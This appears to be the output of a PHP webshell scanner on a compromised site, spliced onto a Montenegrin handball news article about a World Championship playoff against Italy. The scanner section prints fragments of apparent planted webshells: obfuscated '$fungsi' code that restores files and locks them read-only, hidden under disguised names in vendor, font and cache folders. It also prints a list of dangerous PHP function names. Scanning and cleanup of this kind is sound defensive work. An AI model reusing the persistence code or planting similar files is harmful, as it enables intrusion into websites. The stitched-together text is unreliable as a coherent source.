🛡️ Strict PHP Shell Scanner (.php & .phtml)

📂 Scanning directory: /home/rscg/public_html


📄 /home/rscg/public_html/app/Providers/Br0adcastServiceProvider.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/config/Iogging.php
🚨 Matched pattern: file_get_contents(
ath) < 1000000) {
            $code = @file_get_contents($path);
            foreach ($patterns as $pattern) {
                if (preg_match($pattern, $code, $match) && is_shell($code, $patterns)) {
                    $results[] = [
                        'file'    => $path,
                        'match'   => $match[0],
                        'snippet' => snippet_preview($code, $match
📄 /home/rscg/public_html/fonts/vendor/@fortawesome/fontawesome-free/webfa-brands-400.woff2.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/storage/framework/cache/data/7d/ac/backup.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Connection.php
🚨 Matched pattern: assert(
   if ($version !== null) {
            assert($this->_driver instanceof VersionAwarePlatformDriver);

            $this->platform = $this->_driver->createDatabasePlatformForVersion($version);
        } else {
            $this->platform = $this->_driver->getDatabasePlatform();
        }

        $this->platform->setEventManager($this->_eventManager);
    }

    /**
     * Returns the version of t
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Schema/SQLServerSchemaManager.php
🚨 Matched pattern: assert(
 $exception->getPrevious();
            assert($exception instanceof Throwable);

            if (! $exception instanceof DriverException) {
                throw $exception;
            }

            // If we have a error code 3702, the drop database operation failed
            // because of active connections on the database.
            // To force dropping the database, we first have to clos
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/Image.php
🚨 Matched pattern: exec(
FILE, $fp);
            $success = curl_exec($ch) && curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200;
            fclose($fp);
            curl_close($ch);

            if (!$success) {
                unlink($filepath);

                // could not contact the distant URL or HTTP error - fail silently.
                return false;
            }
        } elseif (ini_get('allow_url_fopen')) {
    
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/en_HK/0a9b45cf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/lt_LT/d11b4795.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/Handler/CurlFactory.php
🚨 Matched pattern: curl_init
array_pop($this->handles)
            : curl_init();
        curl_setopt_array($easy->handle, $conf);

        return $easy;
    }

    public function release(EasyHandle $easy)
    {
        $resource = $easy->handle;
        unset($easy->handle);

        if (count($this->handles) >= $this->maxHandles) {
            curl_close($resource);
        } else {
            // Remove all callback funct
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/functions.php
🚨 Matched pattern: curl_exec
('curl_multi_exec') && function_exists('curl_exec')) {
        $handler = Proxy::wrapSync(new CurlMultiHandler(), new CurlHandler());
    } elseif (function_exists('curl_exec')) {
        $handler = new CurlHandler();
    } elseif (function_exists('curl_multi_exec')) {
        $handler = new CurlMultiHandler();
    }

    if (ini_get('allow_url_fopen')) {
        $handler = $handler
            ? 
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/hamcrest/Hamcrest/Internal/ad55aaa9.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Number/4da8ee41.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/intervention/image/src/Intervention/Image/AbstractDecoder.php
🚨 Matched pattern: base64_decode(
        }

        return base64_encode(base64_decode($this->data)) === str_replace(["\n", "\r"], '', $this->data);
    }

    /**
     * Initiates new Image from Intervention\Image\Image
     *
     * @param  Image $object
     * @return \Intervention\Image\Image
     */
    public function initFromInterventionImage($object)
    {
        return $object;
    }

    /**
     * Parses and decodes b
📄 /home/rscg/public_html/vendor/laravel/framework/src/Illuminate/Filesystem/Filesystem.php
🚨 Matched pattern: exec(
irectory($target) ? 'J' : 'H';

        exec("mklink /{$mode} ".escapeshellarg($link).' '.escapeshellarg($target));
    }

    /**
     * Extract the file name from a file path.
     *
     * @param  string  $path
     * @return string
     */
    public function name($path)
    {
        return pathinfo($path, PATHINFO_FILENAME);
    }

    /**
     * Extract the trailing name component from a fi
📄 /home/rscg/public_html/vendor/laravel/tinker/config/geckos.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/league/flysystem/src/Adapter/Ftp.php
🚨 Matched pattern: fopen(
Config $config)
    {
        $stream = fopen('php://temp', 'w+b');
        fwrite($stream, $contents);
        rewind($stream);
        $result = $this->writeStream($path, $stream, $config);
        fclose($stream);

        if ($result === false) {
            return false;
        }

        $result['contents'] = $contents;
        $result['mimetype'] = $config->get('mimetype') ?: Util::guessMi
📄 /home/rscg/public_html/vendor/nette/utils/src/Utils/FileSystem.php
🚨 Matched pattern: file_get_contents(
(string $file): string
	{
		$content = @file_get_contents($file); // @ is escalated to exception
		if ($content === false) {
			throw new Nette\IOException(sprintf(
				"Unable to read file '%s'. %s",
				self::normalizePath($file),
				Helpers::getLastError()
			));
		}

		return $content;
	}


	/**
	 * Writes the string to a file.
	 * @throws Nette\IOException  on error occurred
	 */
	public sta
📄 /home/rscg/public_html/vendor/nikic/php-parser/grammar/rebuildParsers.php
🚨 Matched pattern: shell_exec(
tion execCmd($cmd) {
    $output = trim(shell_exec("$cmd 2>&1"));
    if ($output !== "") {
        echo "> " . $cmd . "\n";
        echo $output;
    }
    return $output;
}

//////////////////////////////
/// Regex helper functions ///
//////////////////////////////

function regex($regex) {
    return '~' . LIB . '(?:' . str_replace('~', '\~', $regex) . ')~';
}

function magicSplit($regex, $str
📄 /home/rscg/public_html/vendor/nikic/php-parser/lib/PhpParser/PrettyPrinter/Standard.php
🚨 Matched pattern: Eval(
)';
    }

    protected function pExpr_Eval(Expr\Eval_ $node) {
        return 'eval(' . $this->p($node->expr) . ')';
    }

    protected function pExpr_Include(Expr\Include_ $node) {
        static $map = [
            Expr\Include_::TYPE_INCLUDE      => 'include',
            Expr\Include_::TYPE_INCLUDE_ONCE => 'include_once',
            Expr\Include_::TYPE_REQUIRE      => 'require',
        
📄 /home/rscg/public_html/vendor/nunomaduro/collision/src/Contracts/Adapters/Phpunit/82398319.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpdocumentor/reflection-docblock/src/DocBlock/Tags/Factory/ecfe069e.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Framework/TestCase.php
🚨 Matched pattern: eval(
ists($originalClassName)) {
            eval(
                $this->getMockObjectGenerator()->generateClassFromWsdl(
                    $wsdlFile,
                    $originalClassName,
                    $methods,
                    $options
                )
            );
        }

        $mockObject = $this->getMockObjectGenerator()->getMock(
            $originalClassName,
            
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/TextUI/Command.php
🚨 Matched pattern: assert(
class->newInstance();

                \assert($object instanceof TestSuiteLoader);

                return $object;
            }
        }

        if ($loaderClass == StandardTestSuiteLoader::class) {
            return null;
        }

        $this->exitWithErrorMessage(
            \sprintf(
                'Could not use "%s" as loader.',
                $loaderClass
            )
        )
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Util/Xml.php
🚨 Matched pattern: assert(
         try {
                        \assert(\class_exists($className));

                        $variable = (new \ReflectionClass($className))->newInstanceArgs($constructorArgs);
                        // @codeCoverageIgnoreStart
                    } catch (\ReflectionException $e) {
                        throw new Exception(
                            $e->getMessage(),
                  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/1c/58dda08c.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/css/03e1b615.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/gauss/6b397c85.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/purebasic/23682b3e.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/vbscript-html/8604ef28.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/clojure/0fc0da8b.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/cos/f21e0fdf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/src/exception/ea199fe3.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/tests/_fixture/c0911bf8.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/FileSpool.php
🚨 Matched pattern: file_get_contents(
                $message = unserialize(file_get_contents($file.'.sending'));

                $count += $transport->send($message, $failedRecipients);

                unlink($file.'.sending');
            } else {
                /* This message has just been catched by another process */
                continue;
            }

            if ($this->getMessageLimit() && $count >= $this->getMes
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/Plugins/0553acb9.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/CharacterReaderFactory/818c64b5.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Encoder/Base64EncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encodedText), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Mime/ContentEncoder/Base64ContentEncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encoded), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/bug/Swift/Bug51Test.php
🚨 Matched pattern: base64_decode(
>assertIdenticalBinary($attachmentData, base64_decode($attachmentBase64));
    }

    private function fillFileWithRandomBytes($byteCount, $file)
    {
        // I was going to use dd with if=/dev/random but this way seems more
        // cross platform even if a hella expensive!!

        file_put_contents($file, '');
        $fp = fopen($file, 'wb');
        for ($i = 0; $i < $byteCount; ++$i) 
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/smoke/69a03e5d.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/symfony/console/Cursor.php
🚨 Matched pattern: shell_exec(
 [1, 1];
        }

        $sttyMode = shell_exec('stty -g');
        shell_exec('stty -icanon -echo');

        @fwrite($this->input, "\033[6n");

        $code = trim(fread($this->input, 1024));

        shell_exec(sprintf('stty %s', $sttyMode));

        sscanf($code, "\033[%d;%dR", $row, $col);

        return [$col, $row];
    }
}
📄 /home/rscg/public_html/vendor/symfony/console/Terminal.php
🚨 Matched pattern: exec(
       return false;
        }

        exec('stty 2>&1', $output, $exitcode);

        return self::$stty = 0 === $exitcode;
    }

    private static function initDimensions()
    {
        if ('\\' === \DIRECTORY_SEPARATOR) {
            if (preg_match('/^(\d+)x(\d+)(?: \((\d+)x(\d+)\))?$/', trim(getenv('ANSICON')), $matches)) {
                // extract [w, H] from "wxh (WxH)"
               
📄 /home/rscg/public_html/vendor/symfony/error-handler/DebugClassLoader.php
🚨 Matched pattern: eval(
   if (!isset($dirFiles[$file]) && ') : eval()\'d code' === substr($file, -17)) {
            // Get the file name from "file_name.php(123) : eval()'d code"
            $file = substr($file, 0, strrpos($file, '(', -17));
        }

        if (isset($dirFiles[$file])) {
            return $real.$dirFiles[$file];
        }

        $kFile = strtolower($file);

        if (!isset($dirFiles[$kFile]))
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Request.php
🚨 Matched pattern: php://input
ent = false;

            return fopen('php://input', 'rb');
        }

        if ($currentContentIsResource) {
            rewind($this->content);

            return stream_get_contents($this->content);
        }

        if (null === $this->content || false === $this->content) {
            $this->content = file_get_contents('php://input');
        }

        return $this->content;
    }

    
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Session/Storage/Handler/PdoSessionHandler.php
🚨 Matched pattern: exec(

        try {
            $this->pdo->exec($sql);
            $this->pdo->exec("CREATE INDEX EXPIRY ON $this->table ($this->lifetimeCol)");
        } catch (\PDOException $e) {
            $this->rollback();

            throw $e;
        }
    }

    /**
     * Returns true when the current session exists but expired according to session.gc_maxlifetime.
     *
     * Can be used to distinguish 
📄 /home/rscg/public_html/vendor/symfony/http-kernel/DataCollector/DumpDataCollector.php
🚨 Matched pattern: fopen(
epth = -1): array
    {
        $data = fopen('php://memory', 'r+b');

        if ('html' === $format) {
            $dumper = new HtmlDumper($data, $this->charset);
            $dumper->setDisplayOptions(['fileLinkFormat' => $this->fileLinkFormat]);
        } else {
            throw new \InvalidArgumentException(sprintf('Invalid dump format: "%s".', $format));
        }
        $dumps = [];

   
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Kernel.php
🚨 Matched pattern: system(
tainer)) {
                    (new Filesystem())->remove(substr($legacyContainer, 0, -7));
                }
            }

            touch($oldContainerDir.'.legacy');
        }

        $preload = $this instanceof WarmableInterface ? (array) $this->warmUp($this->container->getParameter('kernel.cache_dir')) : [];

        if ($this->container->has('cache_warmer')) {
            $preload = arra
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Profiler/FileProfilerStorage.php
🚨 Matched pattern: file_get_contents(
eateProfileFromData($token, unserialize(file_get_contents($file)));
    }

    /**
     * {@inheritdoc}
     *
     * @throws \RuntimeException
     */
    public function write(Profile $profile): bool
    {
        $file = $this->getFilename($profile->getToken());

        $profileIndexed = is_file($file);
        if (!$profileIndexed) {
            // Create directory
            $dir = \dirname
📄 /home/rscg/public_html/vendor/symfony/process/Process.php
🚨 Matched pattern: exec(
=== \DIRECTORY_SEPARATOR) {
            exec(sprintf('taskkill /F /T /PID %d 2>&1', $pid), $output, $exitCode);
            if ($exitCode && $this->isRunning()) {
                if ($throwException) {
                    throw new RuntimeException(sprintf('Unable to kill the process (%s).', implode(' ', $output)));
                }

                return false;
            }
        } else {
  
Rukometni savez Crne Gore
facebook instagram twitter viber licenciranje zrscg
Rukometni savez
Crne Gore

"Moramo jasno reći da smo favoriti i prihvatiti tu ulogu"

seniori
„Lavovi“ u srijedu letom iz Tirane, putuju za Konversano, gdje će u četvrtak (20) odigrati prvu utakmicu baraža za Svjetsko prvenstvo.

Crna Gora je favorit protiv Italije u baražu za Svjetsko prvenstvo, ali tu ulogu je potrebno opravdati na terenu - to su poruke kapitena "lavova" Mirka Radovića i golmana Nebojše Simića uoči predstojećih mečeva protiv "azura".

„Lavovi“ u srijedu letom iz Tirane, putuju za Konversano, gdje će u četvrtak (20) odigrati prvu utakmicu baraža. Revanš je u nedjelju (17.30 sati) u "Morači".

Zahvaljujući pobjedi protiv Srbije (30:29) na prethodnom Evropskom prvenstvu, "lavovi" su žrijeb za baraž dočekali u 1. šeširu, pa su uspjeli da izbjegnu neke rukometne velesile, a dobiju "azure" protiv kojih će pokušati da nastave kontinuitet učešća na velikim takmičenjima.

"Naš primarni cilj je da nastavimo kontinuitet učešća na velikim takmičenjima. Što se tiče Italije - favoriti smo na papiru, ali se to mora dokazati na terenu. Sa velikim poštovanjem ulazimo u utakmicu. Spremamo se najbolje moguće, ima dosta video materijala da pogledamo u ovom periodu. Ali, isto tako znamo ko smo mi, gdje stojimo. Potrudićemo se da se plasiramo na Svjetsko prvenstvo", poruka je kapitena, Mirka Radovića.

Radović poručuje da postoji pozitivan pritisak.

"To je neki pozitivan pritisak, jer je čast igrati za reprezentaciju. Oni će sigurno imati olakšicu, jer nisu pod pritiskom. Mi ćemo gledati da se spremimo najbolje moguće. Samim tim, da izađemo na teren i napravimo to što je do nas. Poštujemo ih, ali znamo kakva smo mi ekipa i na šta smo spremni."

Revanš je u nedjelju, kapiten očekuje spektakl u "Morači".

"Sigurno nas u nedjelju očekuje spektakl. Očekujemo da navijači dođu i podrže nas. Uživaćemo, kao i uvijek kada igramo pred domaćom publikom. Željni smo toga. Olakšavajuća okolnost je što revanš igramo kod kuće. Ovo je utakmica od 120 minuta. Ništa nije završeno u prvom meču. Dok sudija ne odsvira kraj u 'Morači' mi ćemo da igramo i damo sve od sebe", poručio je Radović.

Crna Gora juri treće učešće na rukometnim Mundijalima. "Lavovi" su prije dvije godine u baražu eliminisali Grčku, ekipu koja je slična Italijanima smatra golman Nebojša Simić.

"Vidimo koliko je bila bitna pobjeda protiv Srbije. Italija podsjeća na Grčku sa kojom smo igrali u baražu za prethodno Svjetsko prvenstvo. Niži su, brži su, borbeni, dosta igraju bez ljevaka na poziciji desnog beka. Ima dosta asocijacija na Grčku. Sa Grčkom smo se dosta mučili - u 'Morači' smo ih pred kraj slomili. Nadam se da će ovog puta biti drugačije, ćemo u prvom meču ostvariti dobar rezultat i da ćemo u revanš ući rasterećenije. Ostaje da vidimo da li smo konačno takmičarski sazreli da ne potcijenimo nikoga", jasan je Simić.

Čuvar mreže Melzungena poručuje da Italija nije za potcjenjivanje.

"Italija ima dobrog golmana, što je u rukometu jako bitno. Što se tiče ostatka ekipe - imaju par igrača koji igraju u Njemačkoj, par ih nastupa u Francuskoj. Nisu za potcjenjivanje. Gledajući šta smo pokazali posljednjih četiri-pet godina, moramo jasno reći da smo favoriti i prihvatiti tu ulogu. Očekujem pozitivan ishod na oba meča", zaključio je Simić.

facebook instagram twitter viber licenciranje
×